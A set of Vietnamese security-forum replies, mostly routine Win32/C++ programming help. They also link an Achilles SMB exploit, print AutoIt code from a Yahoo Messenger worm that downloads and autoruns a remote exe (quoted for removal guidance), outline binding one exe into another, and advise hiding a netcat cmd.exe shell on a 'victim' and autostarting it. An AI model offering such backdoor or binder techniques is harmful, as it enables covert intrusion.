|
|
Trong bộ http://www16.fixdown.com/en/27cdc9db8028dcea.asp?en-Retail2=Retail-down đã bao gồm SoftIce.
|
|
|
Hì hì,
Cách khác, đơn giản hơn: update newest virus definition & scan.
|
|
|
http://www.packetstormsecurity.org/0607-exploits/Achilles.c
hackernohat wrote:
Nếu em đây ngu muội xin bỏ qua cho ,theo nhận xét của cá nhân em thì tính dung hại của cái thèng này nằm ở chỗ nó random flags ,hic làm seo mà lọc đc khi mà nó cứ nhảy tùm lum ,không có dạng nhất định như là các DoS System như Trin00 hay tn2k
Chưa cần xét tới filter packet, vấn đề cơ bản là tại sao một gói tin dị dạng: chỉ có header, checksum sai... lại gây ra treo dịch vụ SMB trên port 135 được?. Nguyên nhân phỏng đoán là tại một đoạn code xử lý packet dị dạng nằm trong file mrxsmb.sys gây ra bof khiến cạn kiệt tài nguyên. Bây giờ cần phải reverse file này để tìm ra nguyên nhân.
|
|
|
Hi Luke,
Cảm ơn bạn đã đưa ra một số ý kiến và nhận xét sâu sắc.
Hơn nữa, muốn bảo mật tốt thì phải hiểu về nó. Nếu light.phoenix bảo mật tốt thì cũng phải nghịch ngợm không ít rồi. Cái nguyên lý này tôi nghĩ bạn cũng phải hiều.
Mình cũng biết điều này. Muốn bảo vệ được cái gì phải thực sự nắm rõ về nó. Nhưng khái niệm "nghịch ngợm" làm sao không được ảnh hưởng tới người khác. Không phải vô cớ mà rất nhiều exploit code không thể sử dụng ngay theo kiểu nhắm mắt dùng của scriptkiddes. Theo rất nhiều đánh giá, thiệt hại do đám này gây ra không kém gì so với những tay chuyên nghiệp, thậm chí còn hơn.
Nổi danh? Ai cũng có 1 cái uy tín của mình, đó cũng là danh tiếng. Tôi nghĩ bạn cũng sẽ không từ chối cái đó, thậm chí có thể còn thích nữa. Còn việc thích nổi danh theo kiểu này thì cũng cần phải xem xét lại, bởi vì chẳng ai thích mang tai tiếng vào người cả, chưa kể khoản tiền phạt méo mặt nữa chứ.
Tuy nhiên có 1 điều: NHIỆT TÌNH + THIẾU HIỂU BIẾT = PHÁ HOẠI + HẬU Q
Con người nói chung thường hướng tới hai mục tiêu: vật chất và danh tiếng. Mình thừa nhận không nằm ngoài quy luật đó. Nhưng để đạt được các điều này bằng mọi cách thì không phải là điều hay. Nổi danh vì trình độ thực sự của bản thân, giúp ích cho cộng đồng luôn được kính trọng và ngưỡng mộ hơn nổi danh vì phá hoại, dù vô tình hay hữu ý.
Rega
|
|
|
Xin hỏi bạn học hỏi được gì từ đoạn code của xrobot kia? Kĩ năng lập trình mạng chăng? Hay lập trình hệ thống, hooking API, RCE...? Chỉ đơn giản là mấy lệnh script ghi registry, download file và send key không hơn không kém.
"Nghề" mà bạn đề cập đơn thuần chỉ có mục đích phá hoại, thích nổi danh mà thôi.
|
|
|
Đọc về FAT ở http://en.wikipedia.org/wiki/File_Allocation_Table
|
|
|
Tới thời điểm hiện tại (7:40 01-08-2006), host trên đã bị disable:
Xin lỗi tới toàn thể người dùng Internet Việt Nam
Đây kô phải là 1 trang giải trí mà là 1 trang chứa virus
Webhost này là do tôi cho nhiều người bạn mượn, kô ngờ bị lợi dụng để phân tán virus
nếu bạn bị dính trojan này, xin hãy vào bkav.com.vn để cập nhật chương trình quét
|
|
|
Title: Một virus qua YIM mới vừa xuất hiện.
Chiều tối nay vừa bật YIM lên đã gặp một loạt thông điệp dạng:
http://fun.nguoiiu.com/life/ Tang ban ne
etc...
Đoán 90% là một kiểu YIM worm mới, vì có hành vi rất giống với AutoIt.Gaixinh.
Mở theo cái link trên, save được một file exe vlove.exe. Qua phân tích, kết quả cho thấy đây là một dạng "hậu duệ" của Gaixinh Có lẽ chú script-kiddies nào mang code gaixinh về sửa đổi.
Sau đây là một đoạn code
Code:
; <AUT2EXE VERSION: 3.1.1.0>
; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-START: E:\VICTORY's Documents\ICON\New Icon\vlove.au3>
; ----------------------------------------------------------------------------
AutoItSetOption ("TrayIconHide","1")
AutoItSetOption ("WinTitleMatchMode", "4")
AutoItWinSetTitle ("MTVCSTART")
While WinExists("MTVCLOVE")
WinClose("MTVCLOVE")
WEnd
AutoItWinSetTitle ("MTVCLOVE")
Sleep(5000)
; Phan chinh
Dim $mess[5]
Dim $dfmess[5]
If Not FileExists(@WindowsDir & "\system32.exe") Then
InetGet ("http://fun.nguoiiu.com/y/vlove.exe" ,@WindowsDir & "\system32.exe")
Sleep(10000)
EndIf
; Tao tin nhan
$dfmess[0] = " http://fun.nguoiiu.com/life/ Vui qua ne "
$dfmess[1] = " http://fun.nguoiiu.com/life/ Truyen cuoi do, vao di =)) "
$dfmess[2] = " http://fun.nguoiiu.com/life/ Tang ban ne =)) "
$dfmess[3] = " http://fun.nguoiiu.com/life/ =)) vao day nhe! Chuc vui ve!"
$dfmess[4] = " http://fun.nguoiiu.com/life/ haaaaa =)) =)) Trui, ngo nghinh wa' *-^"
InetGet ( "http://files.myopera.com/mtvcfun/files/messenger.txt" ,@TempDir & "\messenger.txt" ,1,1)
...
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run","system32","REG_SZ", @WindowsDir & "\system32.exe")
RegWrite("HKEY_CURRENT_USER\SOFTWARE\microsoft\Internet Explorer\Main", "Start Page", "REG_SZ", "http://fun.nguoiiu.com/life/")
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_Launchcast","content url","REG_SZ", "http://fun.nguoiiu.com/y/")
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_buzz","content url","REG_SZ", "http://fun.nguoiiu.com/y/")
...
; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-END: E:\VICTORY's Documents\ICON\New Icon\vlove.au3>
; ----------------------------------------------------------------------------
Mình chỉ trích một số đoạn code cho đủ để hiểu cách remove virus này như thế nào.
Mô tả sơ lược
1. Các loại thông điệp gửi qua YIM như sau:
http://fun.nguoiiu.com/life/ Vui qua ne
http://fun.nguoiiu.com/life/ Truyen cuoi do, vao di
http://fun.nguoiiu.com/life/ Tang ban ne
http://fun.nguoiiu.com/life/ vao day nhe! Chuc vui ve!
http://fun.nguoiiu.com/life/ haaaaa Trui, ngo nghinh wa' *-^
2. Virus lấy file từ http://fun.nguoiiu.com/y/vlove.exe, ghi vào %Windows%\system32.exe
3. Tạo key run trong HKCU\Software\Microsoft\Windows\CurrentVersion\Run
system32 = %Windows%\system32.exe
4. Đặt lại homepage của IE:
HKCU\SOFTWARE\microsoft\Internet Explorer\Main
Start Page="http://fun.nguoiiu.com/life/"
5. Sửa key:
HKCU\Software\Yahoo\pager\View\YMSGR_Launchcast
content url = "http://fun.nguoiiu.com/y"
HKCU\Software\Yahoo\pager\View\YMSGR_buzz
content url="http://fun.nguoiiu.com/y/"
PS: Có thể việc public code gaixinh là nguyên nhân chủ yếu của sự vụ này
|
|
|
Em thấy cái gói tin mà chương trình gửi đi, TCP Header bị thiếu mất pseudo_header, checksum cũng tính không đúng nữa ! Khi tính checksum thì có cả pseudo, còn gửi đi thì không có :cry: . Dest port thì bị chỉ định sai, không phải port 135.
-> Em chưa hiểu cơ chế nào khiến service SMB của Windows bị treo. Có phải bug này được mô tả trong MS06-030 không?
(Hình như src này cố ý sửa đổi rồi thì phải, các tham số dòng lệnh và trong src không tương ứng ... )
|
|
|
A & B cùng truy xuất chung một ô nhớ, do đó cần có cơ chế điều khiển tương tranh. Trong trường hợp cả hai chương trình đều do bạn viết, cơ chế này được thực hiện qua các kĩ thuật inter-processes synchronization (dùng semaphore, mutex...). Theo mình hiểu thì LQV0604 muốn A là một dạng tool trainer, còn B là một game nào đó, cho nên điều khiển B hạn chế truy cập vào vùng nhớ chung sẽ gặp khó khăn.
B truy cập vùng nhớ không nhất thiết phải thực hiện qua hàm Read/WriteProcessMemory: vì đây là vùng nhớ ngay chính trong process, có thể là biến local trong stack, biến static, global hay heap..., có thể truy cập trực tiếp bằng con trỏ.
Giải pháp của các trainer hiện tại đa số không quan tâm tới tranh chấp khi truy cập, khi cần patch process memory sẽ gọi trực tiếp hàm Write.
|
|
|
Bạn chú ý là VC++ chỉ hỗ trợ compile prj ra dạng console của Windows, chứ không thể compile ra file exe chạy trong DOS.
char buffer[4] = "xxx";
dậy như là 1 dạng chuỗi rồi ? vậy em lồng các hàm khác vào được ko anh ????
Chưa hiểu rõ ý định "lồng các hàm khác vào" của bạn? Cần ghi dữ liệu gì vào file, trong lời gọi WriteFile, bạn đặt con trỏ tới vùng nhớ chứa dữ liệu đó tại tham số thứ hai, tham số thứ ba là kích thước khối dữ liệu (tính theo bytes) cần ghi. (Thao khảo MSDN về các hàm API này).
|
|
|
Em đoán bof là Buffer Overflow
|
|
|
To nhocbmt:
Bạn cần làm quen với API của Windows: các hàm CreateFile, ReadFile/WriteFile, CloseHandle.
ie:
Code:
HANDLE hFile = CreateFile("D:\\a.exe",
GENERIC_WRITE,
0,
NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);
if(hFile != INVALID_HANDLE_VALUE)
{
char buffer[4] = "xxx";
DWORD dwWritten;
WriteFile(hFile, buffer, strlen(buffer), &dwWritten, NULL);
CloseHandle(hFile);
}
Nếu dùng MFC bạn có thể dùng class CFile cho đơn giản.
Cách khác: sử dụng các hàm file I/O trong stdio.h (fopen, fwrite, fclose) hoặc iostream của C/C++ chuẩn.
|
|
|
Theo ý muốn của bạn: file exe thứ nhất (inject.exe) được ghép vào file exe thứ hai (host.exe) tạo ra file mới là newhost.exe. Khi thực thi file newhost.exe, đoạn mã trong inject.exe được thực thi trước, sau đó tới host.exe.
Có thể thực hiện điều trên bằng cách sau:
1. Tạo thêm một resource chèn vào file host.exe. Resource này chứa nội dung file inject.exe đã nén, mã hoá...
2. Thêm một code section chứa đoạn mã tách lấy resource ở trên, giải mã, tạo lại file inject.exe ban đầu (ghi ra %TEMP% chẳng hạn), và cuối cùng là exec file này. Chờ khi exec xong sẽ trả giá trị OEP cho thanh ghi IP.
3. Sửa đổi EP trong PE Header trỏ tới đoạn mã bắt đầu trong code section vừa thêm.
Nếu bạn hiểu biết định dang PE file, lập trình Asm32 và cơ chế đơn giản của packer/unpacker thì sẽ làm được điều trên. Có thể tham khảo opensrc của UPX (như bác LVH đề cập) để biết packer hoạt động như thế nào.
|
|
|
Một số chương trình có cơ chế chỉ được phép chạy một instance duy nhất. Do đó muốn chạy 2 instances, theo lý thuyết thì vẫn làm được khi sửa mã nhị phân của chương trình, tại đoạn mã kiểm tra instance. Nhưng khi sửa mã như vậy, không thể đảm bảo chương trình sẽ hoạt động tốt.
|
|
|
Hì, MySQL hay MS SQL thì không chạy được trên DOS, nhưng lấy Foxpro for DOS ra thử lệnh SQL được đấy :-p
|
|
|
Khởi tạo giá trị biến con trỏ không có nghĩa là cấp vùng nhớ cho nó.
Bạn cấp vùng nhớ cho temp để chứa tất cả các ký tự của strContent. Theo như mình hiểu thì temp chứa ký tự Unicode dạng UTF8, được convert sang UCS-2 qua hàm Convert_String. Trong hàm này có strlen để tính độ dài xâu. Vậy thì độ dài xâu ký tự của temp là strContent.GetLength() + 1.
Chú ý xoá vùng nhớ đã cấp phát sau khi dùng xong.
|
|
|
Code:
BYTE * temp=0;
for(int i=0;i< strContent.GetLength() ;i++)
{
temp[i]=strContent.GetAt(i);
}
Bạn chưa cấp phát vùng nhớ cho *temp mà đã dùng -> crash.
Và nên chú ý là các class của MFC chỉ sử dụng được unicode, cụ thể là với wchar_t, khi biên dịch có khai báo macro UNICODE & _UNICODE.
|
|
|
Không hiểu đã có Admin rồi thì cần gì sang Local System ? Admin cũng có toàn quyền với cacls.
|
|
|
Editplus chỉ là editor soạn thảo code thôi. Còn lại để biên dịch ứng dụng Windows, bạn cần ít nhất là Win32 SDK (có thể download free trên microsoft.com). Nhưng khi đó chỉ sử dụng được Win API chứ không có MFC.
Nếu dùng IDE như VC++ 6 hay VS.NET, bộ công cụ đã tích hợp sẵn SDK & editor nên công việc đơn giản hơn. Bạn có thể dùng thêm các thư viện bổ sung như ATL, MFC...
|
|
|
Bạn xem lại tuỳ chọn về thư mục include trong menu Options.
|
|
|
Bạn hãy tập đọc thông báo lỗi để hiểu trình biên dịch muốn nói gì:
"Unable to open include file STUDIO.H"
-> File là stdio.h hay studio.h ? Kiểm tra lại nhé!
|
|
|
Nếu quên chạy cmd.exe, bạn bật Task Manager bằng tổ hợp Ctrl-Shift-Esc, rồi vào Run để chạy cmd.
|
|
|
Bạn nên search trước khi hỏi:
http://hvaonline.net/hvaonline/posts/list/390.html
Chú ý: nên gõ tiếng Việt.
|
|
|
Có phải forum chưa có chức năng "Report bad post" ? Em thấy chức năng này cần thiết cho quản lý.
|
|
|
To Lao nong
C:\>net user agent 123456 /add
The command completed successfully.
Lệnh này thực hiện local, nếu bạn là admin thì dĩ nhiên sẽ thành công. User tạo ra trên chính máy bạn
C:\>net group Administrator agent /add
This command can be used only on a Windows Domain Controller.
Dùng net localgroup.
|
|
|
Bạn đọc OpenCA Guides ở đây:
http://www.openca.org/openca/docs/files/openca-guide.pdf
Tham khảo trình tự cài đặt OpenCA trong "OpenCA Cookbook" của Kevin Mitcham:
http://sourceforge.net/mailarchive/message.php?msg_id=8798641
|
|
|
neomatrix wrote:
Cho mình hỏi :mình cho netcat của máy tính victim ở chế độ lắng nghe c:\>nc -nvv -l -p 8080 -e cmd.exe thì lúc này máy tính của mình kết nối với máy tính của victim ở cổng 8080 là ok khi máy tính của victim đang chạy command prompt nhưng khi mt của victim tắt command prompt đi thì mình không kết nối đc.Vậy không lẽ mõi lần mình muốn kết nối với máy tính của victim thì mình kêu victim mở comman prompt cho mình kết nối uh.như vậy thì phức tạp wá.Có cách nào mình config netcat mở sẵn cổng mặc định và cho nó chạy ẩn ở máy tính của victim k?? Mình chỉ mới sử dụng netcat lần đầu nên chưa có kinh nghiệm lắm mong nhận được sự giúp đỡ của các bạn.thankx
Bạn để netcat chạy ở chế độ detach (stealth mode) bằng tùy chọn -d để ẩn console.
Muốn cho nc tự động chạy, có thể đặt vào nơi startup nào đó như key RUN của registry, folder startup, service ...
|
|
|
hackermientay wrote:
Còn nếu lệnh net ko chạy dc thì sao, máy chỗ gì đó tui lại chơi gõ net hoài nhưng cũng chẳng chạy dc lệnh nào, chẳng biết nó fix chỗ nào mà cấm dc như vậy nữa, có cách nào mở khóa ko?
Kiểm tra OS có phải Win2k/xp hay là Win9x?
|
|